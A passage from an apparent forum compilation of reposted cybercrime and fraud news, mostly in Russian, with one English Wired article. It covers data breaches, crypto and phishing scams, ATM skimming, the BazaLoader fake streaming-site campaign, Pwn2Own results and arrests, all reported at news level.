Теперь Air India опубликовала собственный отчет о случившемся, предоставив детальный анализ инцидента и его потенциальных последствий, который может оказаться полезен для других авиакомпаний в составе Star Alliance и их клиентов.
По информации Air India, неназванный злоумышленник, похоже, получил доступ к данным о пассажирах за последние 10 лет. Так, у самого национального индийского перевозчика утекла информация 4,5 млн человек, бронировавших билеты в период с 26 августа 2011 года по 3 февраля 2021 года.
В итоге оказались скомпрометированы имена пассажиров, даты рождения, контактная информация, паспортные данные, информация о билетах, данные часто летающих пассажиров Star Alliance и Air India, а также данные их платежных карт. Сообщается, что ни пароли от учетных записей, ни CVV/CVC карт не пострадали.
Air India и SITA заявили, что расследование инцидента еще не завершено, и в будущем появятся новые детали случившегося. Пока же подробности атаки не разглашаются.
Интересно, что через день после публикации Air India в даркнете, на портале, где торгуют утечками данных, появилась запись от злоумышленника, который утверждает, что в его распоряжении есть информация о пассажирах авиакомпании. Пока неясно, правда ли это, или злоумышленник попросту пытается воспользоваться освещением инцидента в СМИ, чтобы обмануть своих клиентов.
Источник: xakep.ru/2021/05/24/sita-leak/
12-летний школьник создал собственную криптовалюту и получил за это одобрение и поддержку сообщества. Его токен стал дорожать, но он решил обмануть всех и продал все монеты почти за $30 тыс., что обрушило ее цену. Потерявшие деньги инвесторы раздули ее стоимость так сильно, что ее создатель мог бы получить $1,5 млн на продаже своих монет. Попутно нажаловались его маме, рассказав о его мошеннических схемах.
Мошенничество в прямом эфире
12-летний школьник обманул криптоинвесторов на $29,6 тыс. (2,96 млн руб. по курсу ЦБ на 21 ноября 2024 г.), продав все токены созданной им же криптовалюты в моменте, когда ее цена была наиболее высока. Инвесторы не стали подставлять вторую щеку и решили вложить в эту монету еще больше денег, чтобы та взлетела в цене гораздо выше. Как пишет профильный портал Coingape, в результате мошенник потерял около полутора миллионов долларов.
Малолетний мошенник создал свою криптовалюту QUANT, которая хоть росла в цене, но крайне медленно. Когда ему удалось заработать $2000 (200 тыс. руб.), он решил похвастаться об этом в заблокированной в России соцсети Х. Его пост увидели другие участники крипторынка и решили поддержать QUANT, начав инвестировать в этот токен.
В момент, когда цена QUANT была наиболее высокой, создатель валюты вышел из игры, продал все имевшиеся у него на руках токены, что обрушило их стоимость. Мошенник наблюдал за тем, как цена QUANT буквально в прямом эфире – он вел стрим, и прямо на этом же стриме избавился от монет, не забыв показать инвесторам средний палец, притом «по-македонски», с двух рук.
Не нужно было злить сообщество
Вложившиеся в QUANT потеряли свои деньги и решили проучить 12-летнего школьника. После продажи его монет сама валюта продолжила существовать, и инвесторы стали вкладывать в нее еще больше денег. В результате цена QUANT выросла на в разы, пишет CoinGape.
Капитализация QUANT выросла с $4 млн, какой она была в момент продажи создателем всех своих монет, до $85 млн. Инвесторы использовали самые разные способы продвижения криптовалюты, в том числе и рекламу в социальных сетях, и это в итоге принесло свои плоды.
Итог этой истории в данном случае промежуточный, потому что QUANT – не единственный токен, созданный 12-летним школьником. Но если бы он не продал свои монеты так быстро, после взрывного роста ее цены он мог бы заработать на них не $29,6 тыс., а $1,5 млн.
Все твоей маме расскажу!
Получив прибыль в $30 тыс., юный мошенник создал еще два токена, назвав их LUCY в честь соей собаки и SORRY в качестве сарказма, пишет Coingape. С их помощью и точно по такой же схеме он сумел заработать еще $24 тыс. (2,4 млн руб.).
Участники крипторынка выразили желание принять строгие меры против ребенка. Это связано с тем, что криптомошенничество растет на рынке в геометрической прогрессии, и многие потеряли свои сбережения из-за подобных мошеннических схем. Например, не так давно в Южной Корее были арестованы 215 человек, укравшие криптовалюту на $232 млн.
Проведя тщательный поиск, криптосообщество отследило местонахождение ребенка и даже вышло на его родителей. После этого под одной из публикаций его матери в социальных сетях появились комментарии, детально описывающие проделки ее сына.
Дальнейшая судьба QUANT
Какое наказание мама мошенника из средней школы устроила своему сыну после того, как ей рассказали о его схемах, к моменту выхода материала известно не было. Подробности о QUANT, напротив, есть в открытом доступе.
В считанные часы криптовалюта потеряла более 50% своей стоимости и продолжает дешеветь. Ее рыночная капитализация за то же время упала с $85 млн до $28,4 млн. Но, по информации Coingape, объем торгов по QUANT по-прежнему высок и составляет $317,5 млн.
Важно отметить, что инвесторы все же сумели выйти в плюс. Они не только разоблачили мошенника, но и успели продать свои монеты QUANT, пока те были в цене.
Эксперты Coingape не исключают, что в будущем QUANT сможет отыграть падение. К тому же, эту криптовалюту продолжают обсуждать в соцсетях, что может положительно сказаться на ее стоимости.
• Video: https://www.cnews.ru/scripts/video.php?file=https://video.cnews.ru/2024/11/quant.MP4&poste
Молодая жительница городка Александровка Кировоградской области без высшего образования, находящаяся в декретном отпуске, решила поправить свое сложное материальное положение за счет незнакомых людей из интернета.
При помощи смартфона девушка завела в социальной сети фейсбук фейковый аккаунт, от имени которого стала размещать в различных группах объявления о продаже женской одежды. Пользователям, которые заинтересовались вещами, она предлагала оплатить товар, перечислив ей на карту полную предоплату. Поскольку суммы были относительно небольшими, некоторые соглашались на такое условие.
После того, как покупатели присылали мошеннице через личные сообщения скриншот, подтверждающий оплату, она обещала в скором времени отправить покупку через Новую Почту, но вместо этого - блокировала пользователей, чтобы они впоследствии не докучали ей своими жалобами.
Суммы ущерба, причиненного потерпевшим мошенницей, были достаточно невелики, чтобы она могла рассчитывать, что правоохранители не заинтересуются масштабами этого преступления. Средний «чек» каждой сделки составлял чуть менее 400 гривен.
Однако, пятеро потерпевших все-таки дошли до полиции со своими заявлениями, в результате чего, личность не очень жадной, но и не слишком умной мошенницы была установлена при помощи банковских данных о получательнице денег.
В суде обвиняемая полностью признала свою вину, но отказалась от дачи показаний. Между прочим, суд квалифицировал данное правонарушение ч.3 ст.190, как тяжкое, поскольку для его совершения использовалась электронно- вычислительная техника, а также имело место многократное повторение.
Однако учитывая отсутствие прежних судимостей, суд принял во внимание, что обвиняемая воспитывает двух малолетних детей, не состоит на учете нарколога и, в целом, положительно характеризуется по месту жительства. По этим причинам, судья назначил ей минимальный из предусмотренных статьей обвинения срок лишения свободы (3 года) и заменил его испытательным сроком в 1 год.
Согласно данным недавнего исследования, проведенного аналитиками OLX Group, на данный вид мошенничества с предоплатой чаще всего попадаются неискушенные жители украинской провинции. Нередко, и сами мошенники обитают там же. При этом, в отношении жителей крупных городов чаще срабатывает схема с фишинговыми ссылками.
По предварительным подсчетам, общая сумма нанесенного потерпевшим ущерба может составить более 2 миллионов гривен.
Как установили полицейские, к противоправной деятельности причастны четверо жителей Днепропетровской и Кировоградской областей. В социальных сетях они искали объявления о сборе денег на помощь ВСУ и лечение раненых бойцов. Затем звонили на номера телефонов, полученные в ходе общения в мессенджере. Используя фейковые аккаунты в соцсетях, фигуранты представлялись работниками платежной организации и предлагали получить денежный перевод из Польши. Под видом конвертирования злотых в гривны, правонарушители предлагали определенный алгоритм действий, получали персональные и банковские данные граждан, после чего присваивали деньги со счетов потерпевших.
Преступную деятельность фигурантов разоблачили сотрудники Каменского РУП совместно с управлением уголовного розыска, уголовного анализа и управлением противодействия киберпреступлениям в Днепропетровской области под процессуальным руководством Каменской окружной прокуратуры.
По местам проживания и в автомобилях злоумышленников правоохранители провели обыски. Изъяты компьютерная техника, мобильные телефоны, банковские карты, «черновые» записи, а также четыре автомобиля.
Фигурантам сообщили о подозрении по ч. 3 ст. 190 (мошенничество), ч. 4 ст. 185 (кража), ч. 1, 2 ст. 361 (несанкционированное вмешательство в работу информационных (автоматизированных), электронных коммуникационных, информационно-коммуникационных систем, электронных коммуникационных сетей) Уголовного кодекса Украины.
Сейчас решается вопрос об избрании им меры пресечения в виде содержания под стражей.
Прокуратура США выразила признательность компании Tether за помощь в блокировке украденных мошенниками USDT и передаче этих активов из нехостингового кошелька в распоряжение правоохранительных органов.
Крупнейший эмитент стейблкоинов Tether сыграл ключевую роль в оказании помощи Министерству юстиции США и Федеральному бюро расследований (ФБР) в конфискации стейблкоинов USDT на сумму около $1,4 млн. В заявлении Минюста говорится, что эта конфискация стала одним из первых случаев, когда Соединенные Штаты вернули присвоенные мошенниками USDT из нехостингового криптовалютного кошелька.
Предположительно, мошенническая схема была нацелена на пожилых граждан по всей территории США. Во всплывающем на мониторе окне от имени Microsoft или Apple сообщалось, что компьютер взломан. Потенциальной жертве предлагалось срочно связаться со службой поддержки по указанному номеру телефона. Затем преступники, применяя различные методы социальной инженерии, убеждали жертв вывести деньги с традиционных банковских счетов и конвертировать в криптовалюту, якобы для защиты от хакеров.
«Мы гордимся нашим сотрудничеством с правительством США в борьбе с финансовым мошенничеством в экосистеме и конфискацией стейблкоинов Tether (USDT) на сумму $1,4 млн. Вместе с правоохранительными органами по всему миру мы продолжим работу по созданию более безопасной и защищенной среды», — сказал генеральный директор Tether Паоло Ардоино (Paolo Ardoino).
Ранее аналитики банковского концерна JPMorgan заявили, что позиции крупнейшего эмитента стейблкоинов Tether стали более уязвимы для влияния со стороны органов госконтроля из-за значительной зависимости компании от американского рынка.
sc: tether.to/en/tether-assists-us-government-in-seizure-of-illicit-funds- linked-to-tech-scam
Как привычные рыночные отношения приносят сотни миллионов долларов ритейлерам в даркнете.
Новое исследование показывает, что, как и большинство легальных товаров, украденные данные проходят через цепочку поставок, состоящую из производителей, поставщиков и потребителей. Эта цепочка включает в себя взаимосвязь нескольких преступных организаций, действующих на незаконных подпольных рынках.
Цепочка поставок украденных данных выглядит так:
[](https://www.securitylab.ru/upload/images/content- img(882).png)
Цепочка поставок украденных данных
Эта цепочка поставок обеспечивается рынками даркнета. По словам специалиста, несколько тысяч продавцов продают десятки тысяч украденных данных на 30 торговых площадках в даркнете. Доход поставщиков за 8 месяцев составил более $140 млн.
Одним из крупнейших рынков являлся Silk Road, закрытый в 2013 году после ареста основателя Росса Ульбрихта . Более того, после этого случая в даркнете открылось множество новых рынков, чтобы восполнить потерю крупного магазина.
Экосистема украденных данных
Исследование экспертов Arstechnika показало, что на 30 торговых площадках в среднем работают 2 158 продавцов, которые выставили на продажу хотя бы один из 96 672 списков товаров.
[](https://www.securitylab.ru/upload/images/content- img(883).png)
Пример «лота» с украденными данными на рынке даркнета
Продавцы и списки цифровых продуктов распределены по рынкам неравномерно. В среднем на торговых площадках было 109 уникальных никнеймов поставщиков и 3222 списка украденных данных. Торговые площадки провели 632 207 продаж на общую сумму $140,3 млн. Однако, на разных рынках большая вариация продаж. В среднем в магазинах осуществлялось 26 342 продажи на $5,8 млн.
Исследователи выявили 3 крупнейшие торговые площадки — «Apollon», «WhiteHouse» и «Agartha» — на них приходится 58% всех продавцов. Их статистика за 8 месяцев:
Исследование описало процветающую теневую экономику и незаконную цепочку поставок, обеспечиваемую рынками даркнета. Пока хакеры регулярно крадут личные данные, будут существовать и рынки для их продажи. Подпольные торговые площадки трудно ликвидировать напрямую, но усилия, направленные на то, чтобы помешать покупателям украденных данных использовать их, могут ослабить подпольную экономику.
Эксперты считают, что достижения в области искусственного интеллекта способны собрать необходимую информацию для предотвращения использования украденных данных в целях совершения мошенничества. Это может остановить цепочку поставок и разрушить теневые торговые отношения.
source: arstechnica.com/tech-policy/2022/12/darknet-markets-generate-millions- in-revenue-selling-stolen-personal-data
Эксперты ФБР, Агентства по кибербезопасности и защите инфраструктуры, организованного при Министерстве внутренней безопасности США (DHS CISA), Австралийского центра кибербезопасности (ACSC), а также Национального центра кибербезопасности Великобритании (NCSC) выпустили совместную рекомендацию по безопасности, в которой причислили уязвимости, наиболее «популярные» у преступников в 2020 и 2021 году.
«Киберпреступники продолжают использовать общеизвестные, зачастую старые уязвимости в программном обеспечении против широкого набора целей, включая организации в государственном и частном секторах по всему миру», — пишут эксперты.
Click to expand...
На основе данных, собранных правительством США, большая часть самых атакуемых уязвимостей была обнаружена после начала 2020 года, и многие баги явно связаны с повсеместным переходом на удаленную работу. В итоге четыре уязвимости, чаще всего использованные в 2020 году, были связаны с удаленной работой, VPN и облачными сервисами.
[](https://xakep.ru/wp- content/uploads/2021/07/355138/2020.png)
«В 2021 году злоумышленники продолжили нацеливаться на уязвимости в устройствах периметра. Среди уязвимостей, которые активно использовались в 2021 году, были проблемы в продуктах Microsoft, Pulse, Accellion, VMware и Fortinet», — говорят правоохранители.
В итоге список самых «популярных» багов 2021 года выглядит так:
«CISA, ACSC, NCSC и ФБР считают, что государственные и частные организации во всем мире остаются уязвимы для компрометации в результате эксплуатации перечисленных CVE. Злоумышленники, скорее всего, будут продолжать использовать старые и известные уязвимости (такие как CVE-2017-11882, влияющая на Microsoft Office) до тех пор, пока те остаются эффективными, а системы не получают патчей. Использование злоумышленниками известных уязвимостей усложняет атрибуцию атак, снижает затраты и минимизирует риски, поскольку [хакеры] не инвестируют в разработку 0-day эксплоитов для своего личного использования, которые они рискуют потерять, если о них станет известно», — заключают эксперты.
Click to expand...
В первый день соревнования для хакеров Pwn2Own 2023, проходящего в Ванкувере, исследователям удалось создать рабочие эксплойты для уязвимостей в Tesla Model 3, Windows 11 и macOS. Приз составил 375 000 долларов и электромобиль Tesla Model 3.
Однако первым на Pwn2Own 2023 пробили Adobe Reader: один из специалистов использовал связку эксплойтов для шести дыр. Задача эксперта была задействовать неполные патчи, позволяющие выйти за пределы песочницы и обойти список запрещённых API. Этот вектор принёс исследователю $50 000.
Далее команда STAR Labs продемонстрировала 0-day эксплойт для брешей в Microsoft SharePoint, награда — $100 000. Эти же ребята взломали Ubuntu Desktop с помощью уже известного эксплойта, за это организаторы выдали им $15 000.
Компания Synacktiv получила $100 000 и Tesla Model 3 за успешную атаку вида TOCTOU (time-of-check to time-of-use) на автомобиль Tesla. Специалисты Synacktiv также использовали TOCTOU и уязвимость нулевого дня для повышения прав в macOS. За это им дали $40 000.
Oracle VirtualBox также успешно атаковали с помощью связки эксплойтов для переполнения буфера и OOB-чтения. Это принесло эксперту Qrious Security $40 000.
Windows тоже не оставили без внимания: 0-day уязвимость, связанная с некорректной обработкой ввода, позволила повысить привилегии в системе.
Агрегатор информации об утечках Have I Been Pwned (HIBP) пополнил свою базу сразу 361 млн адресов электронной почты, а также учетными данными, украденными при помощи малвари или атак типа credential stuffing. Исследователи собрали эти данные из многочисленных хакерских Telegram-каналов, где украденная информация часто бесплатно раздается подписчикам для повышения репутации.
[](https://xakep.ru/wp-
content/uploads/2024/06/463154/stealer-logs-offered-for-free.jpg)Сливы данных
в Telegram
На прошлой неделе исследователь, пожелавший сохранить анонимность, поделился с
владельцем Have I Been Pwned, Троем Хантом (Troy Hunt), базой учетных данных,
собранной из 518 хакерских каналов Telegram-каналов, общий объем которой
составил 122 ГБ.
По словам Ханта, этот огромный дамп содержит более 1700 файлов, свыше 2 млрд строк и 361 млн уникальных email-адресов, причем 151 млн адресов ранее не попадал в поле зрения HIBP. Кроме того, к адресам прилагались пароли, а во многих случаях, еще и информация о сайте, к которому относятся данные.
[](https://xakep.ru/wp-
content/uploads/2024/06/463154/image-3.jpg)Начало одного из файлом дампа
Набор данных настолько велик, что проверить его подлинность практически
невозможно. Однако Хант пишет, что воспользовался формами для сброса пароля на
многих сайтах и убедился, что многие email-адреса действительно связаны с
конкретными ресурсами, перечисленными среди украденных учетных данных.
[](https://xakep.ru/wp-
content/uploads/2024/06/463154/image-5.jpg)Использование формы для сброса
пароля
Также эксперт связался со многими пользователями HIBP, которые ранее избегали
утечек данных, а теперь их email-адреса или пароли «засветились» в собранном
из Telegram-каналов дампе. Множество людей подтвердило исследователю, что
данные верны, и комболиты из хакерских каналов, содержат их настоящие адреса и
учтенные данные (зачастую старые).
Подтвердить подлинность паролей Хант не сумел, ведь для этого ему пришлось бы входить в чужие аккаунты, а это было бы незаконно.
Так как новая информация уже добавлена в Have I Been Pwned, все желающие могут проверить, не были ли взломаны их учетные записи.
THE LATEST ENTRANT in [the streaming wars](https://www.wired.com/story/disney- plus-hbo-max-streaming-wars/) doesn’t stock a deep library of classics or buzzy original series. In fact, it won’t play movies at all, no matter how many times you tap or click. But the creative minds behind BravoMovies likely aren’t deterred by those gaffes. They’re criminal hackers, and their goal is not to deliver a rich home entertainment experience but to deposit malware on your computer.
The BravoMovies campaign, [spotted by](https://www.proofpoint.com/us/blog/threat-insight/bazaflix-bazaloader- fakes-movie-streaming-service) researchers at security firm ProofPoint, has been around since at least early May. While many of its elements seem absurd at a glance—the posters for nonexistent movies, the wince-inducing typos—it shows just how far hackers are willing to go to ensnare their victims.
When you think of phishing campaigns, to the extent that you do at all, you probably picture email attachments laced with malware. Trouble is just a click away. But email services have gotten better at keeping suspicious messages out of your inbox, making it harder for scammers to pull off such cons. Sidestepping those defenses increasingly takes some creativity—and effort , if the group behind BravoMovies is any indication.
Their fake streaming service is just one part of a convoluted, seven-step
process to deliver a so-called backdoor called BazaLoader. They start with an
email, sure. But it contains no malicious links, no tainted attachments that
Gmail's sensors could sniff out. Instead, it simply informs you that your free
trial period on BravoMovies—“amongst the major streaming services on the
planet!”—is coming to an end, and that your credit card is about to be charged
for the “premium plan.” It helpfully provides a phone number to call if you’d
like to cancel.
Calling the number puts you in touch with a call center controlled by the
group; the agent at the other end of the line directs you to the BravoMovies
site, where you can find thumbnails for enticing films such as Women’s and
The Dog Woof. The FAQ section of the site explains that you can “easily
cancel your account” in two clicks. The first of those clicks downloads an
Excel file to your computer. The second enables macros on the file, which in
turn installs BazaLoader on your computer.
It clearly took some work to set up—which says something about the current
malware delivery ecosystem. “Criminals are inherently lazy. They’re going to
do the least amount of work possible to make money," says Crane Hassold,
senior director of threat research at the email security firm Agari. "The fact
that they have to waste this much time to execute the malware shows how little
return on investment they’re getting from traditional email delivery.”
Fake landing pages are already a staple of cybercriminal trickery. Scammers
have created [hundreds of Netflix and Disney+
knockoffs](https://www.theguardian.com/media/2020/apr/19/hackers-exploit-
coronavirus-lockdown-with-fake-netflix-and-disney-pages) in recent years. The
BazaLoader group has made phony sites before too, including a convincing
impersonation of a lingerie
[retailer](https://www.proofpoint.com/us/blog/threat-insight/baza-valentines-
day). But BravoMovies really does go above and beyond.
“We have not seen an entire fake streaming site created before,” says Sherrod DeGrippo, senior director of threat research and detection at Proofpoint. “This is a creative next level of social engineering.”
The details on the BravoMovies site don’t always hold up to close scrutiny, but they give at least a light veneer of credibility to the enterprise. The homepage boasts of not only HD but “Full HD” and 4K streams. Its category offerings are familiar, even if the titles are decidedly not. It advertises mainstream perks like downloads for offline viewing and compatibility with a range of devices (including, confusingly, Blu-ray players).
To create convincing thumbnail posters of films, the attackers raided design- focused social network Behance for images, along with an advertising firm and a book called How to Steal a Dog. The results tilt toward the absurd, but honestly not much more so than what you might find at the bottom of your Netflix queue.
SCREENSHOT: PROOFPOINT
To the extent that errors do jump out, well … maybe they do for you. “We’ve
seen phishing pages that are built on free website builder sites and look like
a child made them, and those are still successful,” says Hassold. “If someone
has gotten to the point that they’ve made it to this landing page, the small
spelling errors that most people would likely see and that would raise a red
flag are probably not going to move the needle very much.”
The scope of the campaign remains unclear, as does its ultimate goal. As a backdoor, BazaLoader acts as a sort of staging area for more purpose-built malware that comes later. Think of it as the Bifröst bridge of Norse legend, but offering passage for ransomware rather than surly Viking gods. ProofPoint says it hasn’t detected whatever that second-stage payload is, but BazaLoader is closely linked to the group behind the notorious Trickbot malware.
The complexity of the BravoMovies method also has its drawbacks. While it's handy for getting around email protections, it's easier to get people to click than to call. "Because it relies so much on human interaction—that is, someone to actually pick up the phone and make a call—there is a lower likelihood of the recipient engaging with the threat actor," says ProofPoint's DeGrippo. She adds that the BazaLoader group typically sends tens of thousands of emails in a given campaign, with broad targeting across geographies and industries.
Still, the fact that they put in so much time and effort indicates that, despite the intricacies of the scheme, it must be working. There are more exciting heist plots out there. But points, at least, for originality.
Хакерская группировка MoneyTaker вновь вышла из тени, похитив деньги российского банка с его корсчёта в Центробанке. Последний раз такое удавалось кибермошенникам в 2018 году, говорится в отчёте компании Group-IB.
Название банка, который атаковали хакеры, не сообщается, также не уточняется точная сумма ущерба. Однако в Group-IB отмечают, что она была самой большой для операций такого рода за последние годы. По некоторым данным, это более полумиллиарда рублей.
Атака была совершена через автоматизированное рабочее место банка в Центробанке, причем началась она еще в июне 2020-го, предположительно, через физическое устройство, установленное в аффилированной сети. В дальнейшем хакеры получили доступ к сети банка и еще на протяжении полугода исследовали ее. В итоге в январе 2021-го злоумышленники получили доступ к системе межбанковских переводов и украли цифровые ключи.
Центробанк провел разбор ситуации и в апреле разослал соответствующий информационный бюллетень.
Эксперты сообщают, что атаку организовала русскоязычная группировка MoneyTaker. Ее участники не раскрыты до сих пор.
В 2018 году Money Taker украла 58 млн руб. с корреспондентского счета ПИР- банка. В том же году ЦБ лишил его лицензии за нарушение «антиотмывочного» законодательства.
Подробнее: https://www.securitylab.ru/news/527614.php
В США предъявлены обвинения девушке, которую поймали с 29 кредитными картами на чужие имена при осмотре ее автомобиля. Как передает местный телеканал Local10, 26-летняя Дайрин Кэррион (Dairene Carrion) привлекла внимание сотрудников полиции в одном из злачных районов Майами (штат Флорида).
Патрулировавшие улицы силовики обратили внимание на машину, которая ехала слишком медленно, при этом ненадолго заезжая в разные кварталы. Такое поведение показалось полицейским подозрительным, и они попытались остановить автомобиль. В ответ Кэррион резко увеличила скорость и решила скрыться в темных переулках на задворках заброшенных предприятий.
Подумав, что она смогла оторваться, девушка припарковала машину и попыталась ее покинуть, однако в этот момент на горизонте появились стражи правопорядка. Сначала внимание полицейских привлекли права Кэррион, срок действия которых истек еще в 2017 году. Кроме этого, оказалась просроченной и регистрация самой Toyota. После этого было принято решение отогнать автомобиль на штрафную стоянку.
Однако, осмотрев машину перед буксировкой, силовики внезапно обнаружили в ней 29 украденных кредитных карточек и три чужих удостоверения личности. Кэррион не смогла объяснить происхождение находок, заявив, что ей все это, видимо, подбросил неизвестный недоброжелатель. Девушка доставлена в исправительный центр, откуда она может выйти, внеся залог в размере 35,5 тысячи долларов.
source: local10.com/news/local/2023/06/22/miami-dade-woman-found- with-29-stolen-credit-cards-ids-during-traffic-stop-police-say
Вчера вечером несколько тысяч пользователей получили скомпрометированное сообщение, отправленное с официального канала поддержки Wallet. В сообщении содержалась фишинговая ссылка, которая была нами не авторизована. Причина этой уязвимости устранена, и никакие пользовательские средства никогда не подвергались угрозе. Злоумышленники обнаружили небольшую уязвимость в нашей интеграции стороннего сервиса, используемого нашей службой поддержки, который позволял им отправлять ограниченное количество сообщений. Наша команда оперативно устранила проблему и отозвала весь внешний доступ.
Примерно 10 пользователей, ответивших на скомпрометированное сообщение, получат полную компенсацию. Мы проведем дополнительные проверки стороннего программного обеспечения нашей службы поддержки клиентов, чтобы убедиться, что подобное не повторится, и приносим извинения за неудобства.
Еще раз повторю: средства всегда были в полной безопасности, и это затронуло только наш плагин обслуживания клиентов - сообщение от команды телеграм
Еженедельно эта незаконная деятельность приносила дельцам до 50 тыс. дол. США.
Служба безопасности разоблачила дельцов, осуществлявших перемаршрутизацию международных звонков в Украину. Их услуги позволяли кому-либо из-за границы анонимно звонить по телефону в нашу страну. Об этом сообщили в СБУ.
Отмечается, что этим каналом пользовались также россияне, что создавало дополнительную угрозу национальной безопасности Украины.
Как рассказали в СБУ, дельцы использовали PROXY-серверы, новейшие технологии IP-телефонии и специализированное программное обеспечение. Это позволяло обходить центры коммутации отечественных операторов и делало все звонки, проходившие через "сервис", невидимыми для украинских правоохранительных органов.
По имеющимся данным, еженедельно эта незаконная деятельность приносила дельцам до 50 тыс. дол. США.
"Чтобы "запутать следы", организаторы "бизнеса" использовали подставных лиц из социально незащищенных слоев населения. Однако украинская спецслужба разоблачила и прекратила незаконную деятельность", - говорится в сообщении.
Правоохранители установили 4-х организаторов нелегального бизнеса. Им сообщили о подозрении по ч. 3 ст. 28 и ч. 5 ст. 361 Уголовного кодекса Украины. Злоумышленникам грозит до 15 лет лишения свободы.
Киберпреступники начали взламывать телеграм- аккаунты при помощи тематических сайтов с изображениями, рассказали аналитики группы компаний «Солар».
Сотрудники центра мониторинга внешних цифровых угроз Solar AURA обнаружили более 300 ресурсов, созданных для кражи профилей в Telegram. На таких сайтах злоумышленники размещают привлекательные изображения, которые пользователи могут найти в поисковой выдаче.
При переходе по ссылке на картинку пользователя перенаправляют на фишинговый ресурс, имитирующий страницу Telegram. Большинство из них носят название вроде «Тебе понравится». При попытке присоединиться к сообществу пользователь попадает на страницу с QR-кодом или формой для ввода логина и пароля от своего аккаунта в мессенджере. Если данные будут введены, они автоматически попадут к мошенникам. Включенная двухфакторная аутентификация не является преградой для злоумышленников.
По данным Солар, эта массированная кампания стартовала в декабре 2023 года. Хакеры создали сеть однотипных сайтов «с сотнями тысяч изображений» и описаний к ним. Картинки на каждом ресурсе объединены по тематике - эксперты обнаружили сайты про аниме, дорамы, фанфики, мемы и даже пиццу. Все обнаруженные ресурсы были заблокированы.
«На сегодняшний день это самая массовая и изощренная кампания, направленная на взлом Telegram-аккаунтов», — заявили в компании.
Следственной частью Следственного управления УМВД России по Смоленской области направлено в суд уголовное дело в отношении гражданина одной из стран ближнего зарубежья, обвиняемого в хищении денег с банковских карт.
По версии следствия, с августа по декабрь 2013 года обвиняемый, 1981 года рождения, создал организованную группу с целью тайного хищения денежных средств со счетов держателей пластиковых банковских карт. В состав вошли ещё двое иностранных граждан 1983 и 1984 годов рождения.
Обвиняемый приобрёл устройства для видеофиксации ввода пин-кодов и получения информации с магнитных полос карт в шифрованном виде (скиммингов). В дальнейшем он лично вручил данные приспособления соучастникам, которые разместили их на банковских терминалах в Смоленске. Злоумышленники получали необходимую информацию и передавали её с помощью цифровых носителей организатору преступной группы. Таким образом, им удалось похитить порядка 1,5 млн рублей с более чем 200 банковских карт.
Двое подельников были задержаны правоохранителями в Смоленске, когда вернулись, чтобы демонтировать считывающие устройства с банкоматов. В декабре 2014 года уголовное дело в отношении них было направлено в суд, оба признаны виновными и осуждены к реальным срокам лишения свободы.
Организатор группы успел скрыться за границей и был объявлен в международный розыск. В 2020 году по каналам Интерпола он был установлен на территории Федеративной Республики Германии. Мужчина экстрадирован в Российскую Федерацию и доставлен в Смоленск, где заключён под стражу.
Ему предъявлено обвинение в совершении преступлений, предусмотренных пунктами
«а» и «б» части 4 статьи 158 Уголовного кодекса Российской Федерации «Кража» и
частью 3 статьи 183 Уголовного кодекса Российской Федерации «Незаконные
получение и разглашение сведений, составляющих коммерческую, налоговую или
банковскую тайну».
Обвиняемый свою вину признал. В настоящее время уголовное дело с утвержденным
прокурором обвинительным заключением направлено в суд для рассмотрения по
существу.
Американские власти предъявили обвинения в контрабанде из Соединенных Штатов в Россию электронной аппаратуры на сумму $50 млн группе в составе 10 человек, участвоваших в сговоре с бывшими и действующими сотрудниками авиакомпании "Аэрофлот". В результате расследования Госдепартамент США отозвал около 113 виз у сотрудников Аэрофлота за участие в этой схеме. Об этом говорится в сообщении пресс-службы прокуратуры Восточного округа штата Нью-Йорк.
Обвинительное заключение и жалоба были обнародованы 19 октября в федеральном суде Бруклина. В заключении 10 человек обвинялись в перевозке украденного имущества, непредставлении экспортной информации, незаконном экспорте электронных устройств и заговоре с целью совершения этих преступлений. Обвиняемые, предположительно, участвовали в незаконной контрабанде электронных устройств, в частности продуктов Apple, из США в Россию с использованием курьеров, многие из которых были действующими и бывшими сотрудниками авиакомпании «Аэрофлот».
Акмал Асадов, Саюз Дайбагья, Антон Перевозников, Шохрух Саидов, Марат Шадхин, Кирилл Сохончук и Зокир Искандеров были арестованы и будут привлечены к уголовной ответственности по телеконференции перед мировым судьей Соединенных Штатов Верой М. Скэнлон. Азамат Бобомуродов был арестован в северном округе штата Иллинойс и будет привлечен к уголовной ответственности в этом округе. Еще двое обвиняемых скрываются от правосудия.
Сет Д. Дюшарм, исполняющий обязанности прокурора США в Восточном округе Нью- Йорка; Кейт Бирн, специальный уполномоченный службы дипломатической безопасности Государственного департамента США, офис в Нью-Йорке; Уильям Ф. Суини-младший, заместитель исполняющего обязанности директора Федерального бюро расследований, полевое отделение Нью-Йорка (ФБР); Трой Миллер, директор полевых операций, таможенного и пограничного контроля, полевое отделение в Нью-Йорке (CBP); Джонатан Карсон, специальный уполномоченный Министерства торговли США, бюро промышленности и безопасности, управления экспортного контроля, полевое отделение в Нью-Йорке (торговля); Питер С. Фитцхью, ответственный специальный агент, отдел расследований внутренней безопасности, Нью-Йоркский офис (HSI); и Дермот Ф. Ши, комиссар Департамента полиции Нью- Йорка (NYPD) объявили об арестах и обвинениях.
«Как утверждалось, обвиняемые были членами международной сети контрабандистов,
которая использовала сеть операторов здесь и в России для обхода экспортных
законов и правил США», - заявил исполняющий обязанности прокурора США г-н
Дюшарм. «В результате сегодняшних арестов сеть была заблокирована, благодаря
выдающейся работе прокуроров Восточного округа Нью-Йорка, которые неустанно
работали вместе с нашими партнерами-агентствами, чтобы внимательно изучать
товары и людей, которые пересекают наши международные границы».
«Если вы считаете, что использование позиций в иностранной авиакомпании для
контрабанды нелегальных товаров на миллионы долларов обратно в Россию, как мы
утверждаем, допустимо, то ответ - нет. Хотя деятельность этой международной
группы контрабандистов демонстрирует наличие уязвимости, она также
подчеркивает, что совместные усилия федеральных агентов, детективов,
аналитиков и прокуроров являются мощным противодействием любой угрозе. Офис
ФБР в Нью-Йорке и наши межучрежденческие партнеры находятся на страже, и мы
серьезно относимся к своим обязательствам по обеспечению соблюдения наших
законов и защите Соединенных Штатов», - заявил заместитель исполняющего
обязанности директора ФБР г-н Суини.
«Это дело представляет собой наглядное отличное взаимодействие
правоохранительных органов», - заявила специальный уполномоченный
Дипломатической службы безопасности г-жа Бирн. «Если преступные сообщества
манипулируют инструментами международных поездок для получения прибыли, тогда
мы все находимся под угрозой с точки зрения национальной безопасности.
Федеральные агентства, полиция и прокуратура США заслуживают высокой оценки за
энергичную защиту интересов и безопасности Соединенных Штатов Америки», -
добавил он.
«CBP применяет комплексный подход к безопасности и контролю границ, объединяя
таможню и иммиграцию в одну скоординированную и поддерживающую друг друга
деятельность, используя наши уникальные органы власти для проведения уголовных
